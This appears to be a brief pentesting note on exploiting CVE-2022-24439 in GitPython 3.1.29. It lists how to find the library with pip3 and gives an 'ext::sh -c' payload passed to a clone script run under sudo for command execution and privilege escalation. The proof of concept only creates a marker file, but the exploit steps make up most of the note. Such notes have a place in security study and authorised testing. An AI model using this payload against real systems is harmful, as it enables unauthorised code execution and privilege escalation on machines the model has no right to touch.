Git Python RCE CVE-2022-24439.md
Vulnerable Library version: 3.1.29
Payload:
<gitpython::clone> 'ext::sh -c touch% /tmp/pwned'Enumeration:
1) Check for all python libraries and dependencies installed on the machine
pip3 list 2) If the Git Python library we found is vulnerable, we can execute the corresponding python program with the payload to RCE
3)
sudo /usr/bin/python3 /path/to/gitclone.py 'ext::sh -c touch% /tmp/pwned'Last updated